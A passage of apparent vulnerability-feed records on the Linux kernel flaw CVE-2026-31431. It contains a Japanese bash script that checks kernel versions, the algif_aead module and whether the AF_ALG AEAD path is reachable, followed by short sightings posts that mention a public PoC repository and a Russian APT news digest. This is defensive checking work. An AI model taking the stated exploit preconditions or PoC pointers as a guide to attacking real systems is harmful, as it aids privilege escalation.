   if ver_ge \"$KERNEL_VER\" \"6.19.12\"; then\n        ok \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 6.19.12 \u4ee5\u964d \u2192 \u4fee\u6b63\u6e08\u307f\u3067\u3059\"\n        OVERALL=0\n    else\n        fail \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 6.19.12 \u672a\u6e80 \u2192 \u8106\u5f31\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u3059\uff01\"\n        VULN_VERSION=1; OVERALL=1\n    fi\n# 6.18.x \u306e\u78ba\u8a8d\nelif [[ \"$KERNEL_MAJOR\" -eq 6 && \"$KERNEL_MINOR\" -eq 18 ]]; then\n    if ver_ge \"$KERNEL_VER\" \"6.18.22\"; then\n        ok \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 6.18.22 \u4ee5\u964d \u2192 \u4fee\u6b63\u6e08\u307f\u3067\u3059\"\n        OVERALL=0\n    else\n        fail \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f 6.18.22 \u672a\u6e80 \u2192 \u8106\u5f31\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u3059\uff01\"\n        VULN_VERSION=1; OVERALL=1\n    fi\n# 4.14 \u301c 6.17.x \u306f\u3059\u3079\u3066\u8106\u5f31 (\u4fee\u6b63\u306f 6.18.22 / 6.19.12 \u7cfb\u306e\u307f)\nelse\n    fail \"\u30ab\u30fc\u30cd\u30eb ${KERNEL_VER} \u306f\u8106\u5f31\u306a\u7bc4\u56f2 (4.14\u301c6.18.21) \u306b\u8a72\u5f53\u3057\u307e\u3059\uff01\"\n    VULN_VERSION=1; OVERALL=1\nfi\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"3. algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u72b6\u614b\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n\n# \u30ed\u30fc\u30c9\u6e08\u307f\u304b\u3069\u3046\u304b\nif lsmod 2>/dev/null | grep -q '^algif_aead'; then\n    warn \"algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u304c\u73fe\u5728\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u307e\u3059\"\n    AFALG_REACHABLE=1\n    [[ \"$OVERALL\" -eq 0 ]] && OVERALL=2\nelse\n    ok \"algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u306f\u73fe\u5728\u30ed\u30fc\u30c9\u3055\u308c\u3066\u3044\u307e\u305b\u3093\"\nfi\n\n# \u30e2\u30b8\u30e5\u30fc\u30eb\u30d5\u30a1\u30a4\u30eb\u304c\u5b58\u5728\u3059\u308b\u304b (\u30ed\u30fc\u30c9\u53ef\u80fd\u304b)\nMODULE_PATH=$(find /lib/modules/\"$(uname -r)\" -name 'algif_aead.ko*' 2>/dev/null | head -1)\nif [[ -n \"$MODULE_PATH\" ]]; then\n    info \"\u30e2\u30b8\u30e5\u30fc\u30eb\u30d5\u30a1\u30a4\u30eb\u304c\u5b58\u5728: ${MODULE_PATH}\"\nelse\n    ok \"algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u30d5\u30a1\u30a4\u30eb\u304c\u898b\u3064\u304b\u308a\u307e\u305b\u3093 (\u30ab\u30fc\u30cd\u30eb\u306b\u7d44\u307f\u8fbc\u307f or \u524a\u9664\u6e08\u307f)\"\nfi\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"4. AF_ALG \u30bd\u30b1\u30c3\u30c8 / AEAD \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0 \u5230\u9054\u6027\u30c6\u30b9\u30c8\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n# PoC \u304c\u5fc5\u8981\u3068\u3059\u308b\u524d\u63d0\u6761\u4ef6\u3092\u300c\u66f8\u304d\u8fbc\u307f\u306a\u3057\u300d\u3067\u78ba\u8a8d\u3059\u308b\u5b89\u5168\u306a\u30c6\u30b9\u30c8\n# (\u5b9f\u969b\u306e\u30b9\u30d7\u30e9\u30a4\u30b9/\u66f8\u304d\u8fbc\u307f\u306f\u884c\u308f\u306a\u3044)\n\nif ! command -v python3 &>/dev/null; then\n    warn \"python3 \u304c\u898b\u3064\u304b\u308a\u307e\u305b\u3093 \u2014 AF_ALG \u5230\u9054\u6027\u30c6\u30b9\u30c8\u3092\u30b9\u30ad\u30c3\u30d7\u3057\u307e\u3059\"\nelse\n    info \"AF_ALG / AEAD \u5230\u9054\u6027\u3092 Python \u3067\u78ba\u8a8d\u4e2d...\"\n    PYTHON_RESULT=$(python3 - <<'PYEOF' 2>&1; true\nimport socket, errno, sys\n\nPF_ALG   = 38\nSOCK_SEQ = 5   # SOCK_SEQPACKET\nALG_SET_KEY  = 1\nALG_SET_IV   = 2\nALG_SET_OP   = 3\n\n# \u2500\u2500 Step 1: AF_ALG \u30bd\u30b1\u30c3\u30c8\u4f5c\u6210 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\ntry:\n    s = socket.socket(PF_ALG, SOCK_SEQ, 0)\nexcept (OSError, AttributeError) as e:\n    print(f\"AF_ALG_UNREACHABLE: {e}\")\n    sys.exit(0)\n\nprint(\"AF_ALG_REACHABLE\")\n\n# \u2500\u2500 Step 2: authencesn(hmac(sha256),cbc(aes)) \u30d0\u30a4\u30f3\u30c9 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nimport struct\n\n# struct sockaddr_alg: sa_family(2), type(14), feat(4), mask(4), name(64), key(32)\nALG_TYPE = b\"aead\\x00\"           + b\"\\x00\" * (14 - len(b\"aead\\x00\"))\nALG_NAME = b\"authencesn(hmac(sha256),cbc(aes))\\x00\"\nALG_NAME += b\"\\x00\" * (64 - len(ALG_NAME))\nsa = struct.pack(\"H\", PF_ALG) + ALG_TYPE + struct.pack(\"II\", 0, 0) + ALG_NAME + b\"\\x00\" * 32\n\ntry:\n    s.bind(sa)\n    print(\"AEAD_ALG_REACHABLE\")\nexcept OSError as e:\n    if e.errno in (errno.ENOENT, errno.EAFNOSUPPORT, errno.EINVAL, errno.ENOBUFS):\n        print(f\"AEAD_ALG_UNREACHABLE: {e}\")\n    else:\n        print(f\"AEAD_ALG_BIND_ERROR: {e}\")\nfinally:\n    s.close()\nPYEOF\n)\n\n    echo \"$PYTHON_RESULT\" | while IFS= read -r line; do\n        case \"$line\" in\n            AF_ALG_UNREACHABLE*)\n                ok \"AF_ALG \u30bd\u30b1\u30c3\u30c8: \u5230\u9054\u4e0d\u53ef (${line#*: }) \u2192 \u653b\u6483\u6761\u4ef6\u3092\u6e80\u305f\u3057\u307e\u305b\u3093\"\n                ;;\n            AF_ALG_REACHABLE)\n                warn \"AF_ALG \u30bd\u30b1\u30c3\u30c8: \u5230\u9054\u53ef\u80fd\"\n                AFALG_REACHABLE=1\n                ;;\n            AEAD_ALG_REACHABLE)\n                fail \"authencesn(hmac(sha256),cbc(aes)) \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0: \u5229\u7528\u53ef\u80fd \u2192 \u60aa\u7528\u6761\u4ef6\u304c\u63c3\u3063\u3066\u3044\u307e\u3059\uff01\"\n                AEAD_REACHABLE=1\n                ;;\n            AEAD_ALG_UNREACHABLE*)\n                ok \"AEAD \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0: \u5229\u7528\u4e0d\u53ef (${line#*: }) \u2192 \u60aa\u7528\u6761\u4ef6\u3092\u6e80\u305f\u3057\u307e\u305b\u3093\"\n                ;;\n            AEAD_ALG_BIND_ERROR*)\n                warn \"AEAD \u30a2\u30eb\u30b4\u30ea\u30ba\u30e0: \u30d0\u30a4\u30f3\u30c9\u30a8\u30e9\u30fc (${line#*: })\"\n                ;;\n        esac\n    done\nfi\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"5. \u30ab\u30fc\u30cd\u30eb\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u8a2d\u5b9a (\u8efd\u6e1b\u7b56)\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n\n# unprivileged user namespace (\u653b\u6483\u7d4c\u8def\u306e\u4e00\u3064)\nif [[ -r /proc/sys/kernel/unprivileged_userns_clone ]]; then\n    val=$(cat /proc/sys/kernel/unprivileged_userns_clone)\n    if [[ \"$val\" -eq 0 ]]; then\n        ok \"unprivileged_userns_clone = 0 \u2192 \u975e\u7279\u6a29\u30e6\u30fc\u30b6\u30fc\u540d\u524d\u7a7a\u9593\u306f\u7121\u52b9\"\n    else\n        warn \"unprivileged_userns_clone = 1 \u2192 \u975e\u7279\u6a29\u30e6\u30fc\u30b6\u30fc\u540d\u524d\u7a7a\u9593\u304c\u6709\u52b9\u3067\u3059\"\n    fi\nfi\n\nif [[ -r /proc/sys/user/max_user_namespaces ]]; then\n    val=$(cat /proc/sys/user/max_user_namespaces)\n    if [[ \"$val\" -eq 0 ]]; then\n        ok \"max_user_namespaces = 0 \u2192 \u30e6\u30fc\u30b6\u30fc\u540d\u524d\u7a7a\u9593\u306f\u7121\u52b9\"\n    else\n        info \"max_user_namespaces = ${val}\"\n    fi\nfi\n\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\nsection \"6. \u7d50\u679c\u30b5\u30de\u30ea\u30fc\"\n# \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\n\necho \"\"\necho -e \"  \u30ab\u30fc\u30cd\u30eb       : ${KERNEL_FULL}\"\necho -e \"  \u8106\u5f31\u30d0\u30fc\u30b8\u30e7\u30f3 : $([ \"$VULN_VERSION\" -eq 1 ] && echo \"${RED}YES${RESET}\" || echo \"${GREEN}NO${RESET}\")\"\necho -e \"  AF_ALG \u5230\u9054\u6027  : $([ \"$AFALG_REACHABLE\" -eq 1 ] && echo \"${YELLOW}\u5230\u9054\u53ef\u80fd${RESET}\" || echo \"${GREEN}\u5230\u9054\u4e0d\u53ef${RESET}\")\"\necho -e \"  AEAD \u5229\u7528\u53ef\u5426  : $([ \"$AEAD_REACHABLE\" -eq 1 ] && echo \"${RED}\u5229\u7528\u53ef\u80fd${RESET}\" || echo \"${GREEN}\u5229\u7528\u4e0d\u53ef${RESET}\")\"\necho \"\"\n\nif [[ \"$VULN_VERSION\" -eq 1 && \"$AEAD_REACHABLE\" -eq 1 ]]; then\n    echo -e \"${RED}${BOLD}\u26a0  \u7dcf\u5408\u5224\u5b9a: \u8106\u5f31 (CVE-2026-31431 \u306e\u653b\u6483\u6761\u4ef6\u304c\u63c3\u3063\u3066\u3044\u307e\u3059)${RESET}\"\n    echo \"\"\n    echo \"  \u3010\u63a8\u5968\u5bfe\u5fdc\u3011\"\n    echo \"    1. \u30ab\u30fc\u30cd\u30eb\u3092\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8:\"\n    echo \"       - 6.18.x\u7cfb \u2192 6.18.22 \u4ee5\u4e0a\"\n    echo \"       - 6.19.x\u7cfb \u2192 6.19.12 \u4ee5\u4e0a\"\n    echo \"       - \u30c7\u30a3\u30b9\u30c8\u30ed\u30d1\u30c3\u30b1\u30fc\u30b8\u4f8b:\"\n    echo \"           Ubuntu: sudo apt update && sudo apt upgrade linux-image-generic\"\n    echo \"           RHEL:   sudo dnf update kernel\"\n    echo \"           Amazon Linux: sudo yum update kernel\"\n    echo \"    2. \u66ab\u5b9a\u63aa\u7f6e: algif_aead \u30e2\u30b8\u30e5\u30fc\u30eb\u3092\u30d6\u30ed\u30c3\u30af\"\n    echo \"       echo 'install algif_aead /bin/false' | sudo tee /etc/modprobe.d/block-algif-aead.conf\"\n    echo \"       sudo update-initramfs -u   # (Ubuntu/Debian)\"\n    echo \"    3. \u518d\u8d77\u52d5\u5f8c\u306b\u672c\u30b9\u30af\u30ea\u30d7\u30c8\u3067\u518d\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002\"\nelif [[ \"$VULN_VERSION\" -eq 1 ]]; then\n    echo -e \"${YELLOW}${BOLD}\u25b3  \u7dcf\u5408\u5224\u5b9a: \u8981\u6ce8\u610f (\u30d0\u30fc\u30b8\u30e7\u30f3\u306f\u8106\u5f31\u3067\u3059\u304c AEAD \u306f\u73fe\u6642\u70b9\u3067\u306f\u5230\u9054\u4e0d\u53ef)${RESET}\"\n    echo \"     \u30ab\u30fc\u30cd\u30eb\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u3092\u63a8\u5968\u3057\u307e\u3059\u3002\"\nelse\n    echo -e \"${GREEN}${BOLD}\u2714  \u7dcf\u5408\u5224\u5b9a: \u5bfe\u7b56\u6e08\u307f / \u5bfe\u8c61\u5916${RESET}\"\n    echo \"     \u3053\u306e\u30b7\u30b9\u30c6\u30e0\u306f CVE-2026-31431 \u306e\u5f71\u97ff\u3092\u53d7\u3051\u307e\u305b\u3093\u3002\"\nfi\n\necho \"\"\necho \"  \u53c2\u8003:\"\necho \"    NVD    : https://nvd.nist.gov/vuln/detail/CVE-2026-31431\"\necho \"    Sysdig : https://www.sysdig.com/blog/cve-2026-31431-copy-fail-linux-kernel-flaw\"\necho \"    PoC    : https://github.com/theori-io/copy-fail-CVE-2026-31431 (Theori \u516c\u5f0f)\"\necho \"\"", "creation_timestamp": "2026-05-12T05:02:30.000000Z"}, {"uuid": "0834593e-3c17-486a-8d2d-f9e754c6a532", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mlne2qg4fl72", "content": "Copy Fail and Dirty Frag: Linux Page-Cache Exploits Target Every Major Distribution Two recent Linux kernel vulnerabilities have been disclosed: Copy Fail (CVE-2026-31431) on April 29, 2026, and Di...\n\n#Linux #Security #Vulnerabilities #DevOps #news\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-12T08:18:21.694131Z"}, {"uuid": "0ab5d1b8-3ba4-4961-b430-d7989880ebfd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/83900", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a gbonacini\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-12 07:57:22\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA CVE-2026-31431 (aka Copyfail) implementation in c++ and assembly\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-12T08:00:04.000000Z"}, {"uuid": "66a829fa-231c-4b7b-adab-10f90cd18da7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/kasperskyb2b/2165", "content": "\ud83d\ude35\u200d\ud83d\udcab \u0418\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f APT \u0437\u0430 \u043d\u0435\u0434\u0435\u043b\u044e\n\n\ud83d\ude08 \u041f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u0430\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u0430 DAEMON Tools \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a. \u0423\u0441\u0442\u0430\u043d\u043e\u0432\u0449\u0438\u043a\u0438 \u0441 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430, \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u043c \u0432\u0435\u043d\u0434\u043e\u0440\u0430, \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0412\u041f\u041e \u0441 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c\u0438 \u043f\u0440\u043e\u0444\u0438\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0436\u0435\u0440\u0442\u0432. \u041d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0434\u0435\u0441\u044f\u0442\u043a\u043e\u0432 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 (\u0433\u043e\u0441\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440, \u043d\u0430\u0443\u0447\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439, \u043f\u0440\u043e\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u044b\u0445 \u0438 \u0442\u043e\u0440\u0433\u043e\u0432\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0432 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u043e\u0440\u0443\u0441\u0441\u0438\u0438 \u0438 \u0422\u0430\u0438\u043b\u0430\u043d\u0434\u0435) \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0442\u043e\u0440\u043e\u0439 \u044d\u0442\u0430\u043f \u0430\u0442\u0430\u043a\u0438 \u2014 \u043c\u0438\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u043d\u044b\u0439 \u0431\u044d\u043a\u0434\u043e\u0440, \u0430 \u0432 \u043e\u0434\u043d\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u2014 \u0431\u043e\u043b\u0435\u0435 \u0441\u043b\u043e\u0436\u043d\u043e\u0435 \u0412\u041f\u041e QUIC RAT.\n\n\u2744\ufe0f \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0442\u0435\u0445\u043d\u0438\u043a \u0438 \u0442\u0430\u043a\u0442\u0438\u043a \u0433\u0440\u0443\u043f\u043f\u044b UAT-8302, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0430\u0442\u0430\u043a\u0443\u0435\u0442 \u0433\u043e\u0441\u043e\u0440\u0433\u0430\u043d\u044b \u0432 \u042e\u0436\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435 \u0438 \u0415\u0432\u0440\u043e\u043f\u0435. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b \u0432\u0445\u043e\u0434\u044f\u0442 \u0431\u044d\u043a\u0434\u043e\u0440\u044b NetDraft \u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043d\u0430\u043c CloudSorcerer, \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u043e\u0432\u043e\u0435 \u0412\u041f\u041e SNOWRUST.\n\n\ud83e\udeb7 \u0420\u0430\u0437\u0431\u043e\u0440 \u0430\u0442\u0430\u043a\u0438 APT OceanLotus, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0431\u044b\u043b\u0438 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u044b \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043e\u0447\u043d\u044b\u0435 \u0430\u0440\u0445\u0438\u0432\u044b Python (wheels), \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0432 PyPI. \u0427\u0435\u0440\u0435\u0437 \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u043c\u043f\u043b\u0430\u043d\u0442 ZiChatBot, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0439 Zulip REST API \u043a\u0430\u043a \u043a\u0430\u043d\u0430\u043b \u04212. ZiChatBot \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043f\u043e\u0434 Windows \u0438 Linux \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u0435\u043d \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043e\u0442 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0448\u0435\u043b\u043b\u043a\u043e\u0434. \u0412 \u0446\u0435\u043b\u043e\u043c \u044d\u0442\u0430 APT \u043f\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u043e \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u0435\u0442 \u0441\u0432\u043e\u0438 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u044b \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0410\u0437\u0438\u0438, \u0430 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 PyPI \u0434\u0430\u0451\u0442 \u0435\u0439 \u0448\u0438\u0440\u043e\u043a\u0438\u0439 \u043e\u0445\u0432\u0430\u0442.\n\n\ud83d\udfe2\u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b Lazarus \u0441\u0434\u0435\u043b\u0430\u043b\u0438  \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u0434\u043b\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Contagious Interview \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0440\u044b\u0442\u043d\u044b\u043c\u0438. \u0425\u0443\u043a\u0438 \u0432 \u00ab\u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0445 \u0437\u0430\u0434\u0430\u043d\u0438\u044f\u0445\u00bb \u0441\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u043d\u0430 \u0440\u0443\u0442\u0438\u043d\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u044f\u0445 git \u0432\u0440\u043e\u0434\u0435 clone \u0438\u043b\u0438 commit, \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u044f \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u044c \u0440\u0443\u0447\u043d\u043e\u0433\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 npm install.\n\n\ud83d\udfe2 APT ScarCruft \u0432\u043d\u0435\u0434\u0440\u0438\u043b\u0430 \u0431\u044d\u043a\u0434\u043e\u0440\u044b \u0432 Windows\u2011 \u0438 Android\u2011\u043a\u043b\u0438\u0435\u043d\u0442\u044b \u043a\u0438\u0442\u0430\u0439\u0441\u043a\u043e\u0439 \u0438\u0433\u0440\u043e\u0432\u043e\u0439 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u044b, \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0443 \u044d\u0442\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043a\u043e\u0440\u0435\u0439\u0446\u0435\u0432 \u0432 \u0440\u0430\u0439\u043e\u043d\u0435 \u042f\u043d\u044c\u0431\u044f\u043d\u044c. \u041c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0431\u043e\u0440\u043a\u0438 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0438 RokRAT \u0438 BirdCall \u0443\u0437\u043a\u043e\u043c\u0443 \u043a\u0440\u0443\u0433\u0443 \u0436\u0435\u0440\u0442\u0432.\n\n\ud83d\udfe2 \u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u043e\u0433\u043e \u0444\u0438\u0448\u0438\u043d\u0433\u0430, \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0431\u0435\u0441\u043f\u0438\u043b\u043e\u0442\u043d\u043e\u0439 \u0430\u0432\u0438\u0430\u0446\u0438\u0438, \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c \u0432 \u0420\u0424 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438. 